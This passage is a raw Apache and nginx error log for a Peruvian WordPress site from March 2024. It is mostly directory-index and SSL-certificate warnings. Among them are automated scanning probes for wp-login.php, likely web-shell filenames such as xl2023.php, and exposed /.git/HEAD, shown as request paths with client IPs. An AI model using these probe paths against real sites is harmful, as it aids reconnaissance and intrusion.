[:error] [pid 5593:tid 140326731683584] [client 38.103.167.2:45060] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php, referer: investigacionperu.com [Fri Mar 22 13:04:36.934003 2024] [:error] [pid 5593:tid 140326748468992] [client 38.103.167.2:45148] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php, referer: investigacionperu.com [Fri Mar 22 13:04:42.192609 2024] [autoindex:error] [pid 5593:tid 140326916323072] [client 38.103.167.2:45172] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:04:52.855824 2024] [autoindex:error] [pid 4963:tid 140326790432512] [client 212.89.6.7:45216] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:05:12.374219 2024] [autoindex:error] [pid 4963:tid 140326723290880] [client 212.89.6.7:45282] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Net/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:05:35.039183 2024] [autoindex:error] [pid 4962:tid 140326773647104] [client 51.15.171.54:45376] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:05:48.127303 2024] [:error] [pid 5593:tid 140326882752256] [client 38.103.167.2:45422] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/2index.php, referer: investigacionperu.com [Fri Mar 22 13:05:48.269699 2024] [:error] [pid 5593:tid 140326807217920] [client 51.15.171.54:45426] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php, referer: investigacionperu.com [Fri Mar 22 13:05:58.599455 2024] [autoindex:error] [pid 4963:tid 140326832396032] [client 38.103.167.2:45470] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/textcolor/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:06:20.244268 2024] [autoindex:error] [pid 5593:tid 140326807217920] [client 165.22.220.140:45538] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/template-part/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:06:49.363424 2024] [autoindex:error] [pid 5593:tid 140326790432512] [client 165.22.220.140:45646] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/preformatted/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:07:04.793128 2024] [autoindex:error] [pid 4963:tid 140326840788736] [client 165.22.220.140:45714] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/pullquote/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:07:12.220989 2024] [autoindex:error] [pid 4963:tid 140326782039808] [client 165.22.220.140:45742] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:07:50.791784 2024] [:error] [pid 5593:tid 140326798825216] [client 38.103.167.2:45866] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/content.php, referer: investigacionperu.com [Fri Mar 22 13:07:57.997824 2024] [autoindex:error] [pid 5593:tid 140326723290880] [client 38.103.167.2:45902] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:07:58.127887 2024] [autoindex:error] [pid 4963:tid 140326807217920] [client 212.89.6.7:45904] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:08:16.835318 2024] [autoindex:error] [pid 5593:tid 140326815610624] [client 212.89.6.7:45966] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:09:10.203914 2024] [autoindex:error] [pid 5593:tid 140326882752256] [client 165.22.220.140:46162] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/sunrise/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:09:40.178021 2024] [autoindex:error] [pid 5593:tid 140326899537664] [client 165.22.220.140:46274] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Decode/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:09:59.783868 2024] [autoindex:error] [pid 4963:tid 140326865966848] [client 212.89.6.7:46348] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/social-link/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:10:04.063220 2024] [:error] [pid 4963:tid 140326824003328] [client 212.89.6.7:46358] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/content.php, referer: investigacionperu.com [Fri Mar 22 13:10:15.345883 2024] [autoindex:error] [pid 5593:tid 140326790432512] [client 165.22.220.140:46396] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:10:19.404216 2024] [autoindex:error] [pid 4962:tid 140326765254400] [client 212.89.6.7:46414] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/HTTP/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:10:37.771266 2024] [:error] [pid 4962:tid 140326756861696] [client 38.103.167.2:46478] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php, referer: investigacionperu.com [Fri Mar 22 13:11:02.148884 2024] [autoindex:error] [pid 4963:tid 140326782039808] [client 212.89.6.7:46564] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:11:17.000705 2024] [autoindex:error] [pid 5593:tid 140326748468992] [client 165.22.220.140:46620] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/paste/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:11:22.891868 2024] [autoindex:error] [pid 5593:tid 140326807217920] [client 165.22.220.140:46644] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/01/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:11:49.629875 2024] [autoindex:error] [pid 5593:tid 140326840788736] [client 165.22.220.140:46738] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:12:21.015825 2024] [autoindex:error] [pid 4962:tid 140326857574144] [client 212.89.6.7:46842] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/nextpage/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:13:11.936166 2024] [autoindex:error] [pid 5593:tid 140326756861696] [client 165.22.220.140:47038] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/theme-compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:13:18.413617 2024] [autoindex:error] [pid 5593:tid 140326782039808] [client 212.89.6.7:47062] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/plupload/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:13:28.761372 2024] [autoindex:error] [pid 4963:tid 140326899537664] [client 212.89.6.7:47098] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:13:32.159980 2024] [:error] [pid 4961:tid 140326807217920] [client 38.103.167.2:47112] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/2index.php, referer: investigacionperu.com [Fri Mar 22 13:14:28.204324 2024] [autoindex:error] [pid 4963:tid 140326782039808] [client 165.22.220.140:47308] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/format-library/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Fri Mar 22 13:14:28.624423 2024] [autoindex:error] [pid 4963:tid 140326765254400] [client 165.22.220.140:47310] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Mar 23 02:20:35.016182 2024] [autoindex:error] [pid 16195:tid 140326756861696] [client 41.216.188.92:35540] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Sat Mar 23 03:41:19.250856 2024] [ssl:warn] [pid 5550:tid 139985415468928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 23 03:41:27.581972 2024] [ssl:warn] [pid 5558:tid 139985415468928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 23 03:41:28.081287 2024] [ssl:warn] [pid 5558:tid 139985415468928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 23 03:41:29.868233 2024] [ssl:warn] [pid 5558:tid 139985415468928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 23 03:41:32.110108 2024] [ssl:warn] [pid 5979:tid 139628926814080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 23 03:41:36.296980 2024] [ssl:warn] [pid 5982:tid 139628926814080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 23 05:27:48.779589 2024] [:error] [pid 6635:tid 139628623415040] [client 117.232.79.219:38888] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Sat Mar 23 05:27:50.222299 2024] [:error] [pid 6003:tid 139628615022336] [client 117.232.79.219:38890] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Sat Mar 23 05:27:52.156552 2024] [:error] [pid 6003:tid 139628598236928] [client 117.232.79.219:38892] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xl2023.php [Sat Mar 23 05:27:54.257718 2024] [:error] [pid 6635:tid 139628727281408] [client 117.232.79.219:38894] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xl2023.php [Sat Mar 23 05:28:19.498377 2024] [:error] [pid 6635:tid 139628615022336] [client 117.232.79.219:38920] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Sat Mar 23 19:03:33.766050 2024] [ssl:warn] [pid 5982:tid 139628926814080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 23 21:07:03.469237 2024] [autoindex:error] [pid 14739:tid 139628514309888] [client 41.216.188.92:43882] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Sun Mar 24 03:28:21.578390 2024] [ssl:warn] [pid 27850:tid 140509004633984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 24 03:28:25.777472 2024] [ssl:warn] [pid 27853:tid 140509004633984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 24 03:28:26.305940 2024] [ssl:warn] [pid 27853:tid 140509004633984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 24 03:28:28.201326 2024] [ssl:warn] [pid 27853:tid 140509004633984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 24 03:28:30.477463 2024] [ssl:warn] [pid 28269:tid 140518614910848] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 24 03:28:42.692426 2024] [ssl:warn] [pid 28271:tid 140518614910848] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 25 03:50:17.772697 2024] [ssl:warn] [pid 5124:tid 139939275696000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 25 03:50:26.052009 2024] [ssl:warn] [pid 5125:tid 139939275696000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 25 03:50:26.642894 2024] [ssl:warn] [pid 5125:tid 139939275696000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 25 03:50:28.480719 2024] [ssl:warn] [pid 5125:tid 139939275696000] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 25 03:50:30.742139 2024] [ssl:warn] [pid 5542:tid 140599349737344] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 25 03:50:39.015254 2024] [ssl:warn] [pid 5543:tid 140599349737344] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/03/25 20:54:27 [error] 5524#5524: *91406 access forbidden by rule, client: 35.183.107.51, server: cpanel.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/03/25 21:35:28 [error] 5524#5524: *91954 access forbidden by rule, client: 18.236.171.243, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "www.investigacionperu.com" [Mon Mar 25 22:29:01.308172 2024] [autoindex:error] [pid 6678:tid 140598992410368] [client 14.225.20.25:53628] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/block-patterns/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Mon Mar 25 22:35:04.229393 2024] [:error] [pid 5561:tid 140598942054144] [client 14.225.20.25:53716] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentytwentyone/index.php:17, referer: investigacionperu.com [Mon Mar 25 22:35:04.229469 2024] [:error] [pid 5561:tid 140598942054144] [client 14.225.20.25:53716] Stack trace:, referer: investigacionperu.com [Mon Mar 25 22:35:04.229480 2024] [:error] [pid 5561:tid 140598942054144] [client 14.225.20.25:53716] #0 {main}, referer: investigacionperu.com [Mon Mar 25 22:35:04.229565 2024] [:error] [pid 5561:tid 140598942054144] [client 14.225.20.25:53716] thrown in /home/investig/public_html/wp-content/themes/twentytwentyone/index.php on line 17, referer: investigacionperu.com [Mon Mar 25 22:36:23.919472 2024] [autoindex:error] [pid 5561:tid 140598900090624] [client 14.225.20.25:53740] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Mon Mar 25 22:36:51.094493 2024] [autoindex:error] [pid 6678:tid 140598942054144] [client 14.225.20.25:53744] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/wordpress/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Mon Mar 25 22:38:16.459504 2024] [autoindex:error] [pid 5561:tid 140599150204672] [client 14.225.20.25:53782] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Mon Mar 25 22:38:20.267019 2024] [autoindex:error] [pid 6678:tid 140599141811968] [client 14.225.20.25:53786] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/comment-edit-link/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Mon Mar 25 22:39:45.618448 2024] [autoindex:error] [pid 6678:tid 140598950446848] [client 14.225.20.25:53798] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/fullscreen/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Mon Mar 25 22:43:02.284157 2024] [autoindex:error] [pid 5561:tid 140598967232256] [client 14.225.20.25:53998] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Engine/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Mon Mar 25 22:45:13.001960 2024] [autoindex:error] [pid 6678:tid 140599125026560] [client 14.225.20.25:54014] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Mon Mar 25 22:46:04.877372 2024] [autoindex:error] [pid 5562:tid 140598975624960] [client 14.225.20.25:54024] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Mon Mar 25 22:46:30.102089 2024] [autoindex:error] [pid 5562:tid 140598950446848] [client 14.225.20.25:54028] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/11/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Tue Mar 26 03:17:17.993523 2024] [ssl:warn] [pid 27587:tid 140022804113280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 26 03:17:26.226380 2024] [ssl:warn] [pid 27594:tid 140022804113280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 26 03:17:26.755614 2024] [ssl:warn] [pid 27594:tid 140022804113280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 26 03:17:28.671296 2024] [ssl:warn] [pid 27594:tid 140022804113280] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 26 03:17:30.920879 2024] [ssl:warn] [pid 28013:tid 140374532376448] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 26 03:17:43.121621 2024] [ssl:warn] [pid 28029:tid 140374532376448] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 27 03:33:29.592324 2024] [ssl:warn] [pid 11607:tid 140268738729856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 27 03:33:37.939981 2024] [ssl:warn] [pid 11609:tid 140268738729856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 27 03:33:38.477889 2024] [ssl:warn] [pid 11609:tid 140268738729856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 27 03:33:40.667700 2024] [ssl:warn] [pid 11609:tid 140268738729856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 27 03:33:42.962579 2024] [ssl:warn] [pid 12027:tid 140267333515136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 27 03:33:55.252773 2024] [ssl:warn] [pid 12030:tid 140267333515136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches 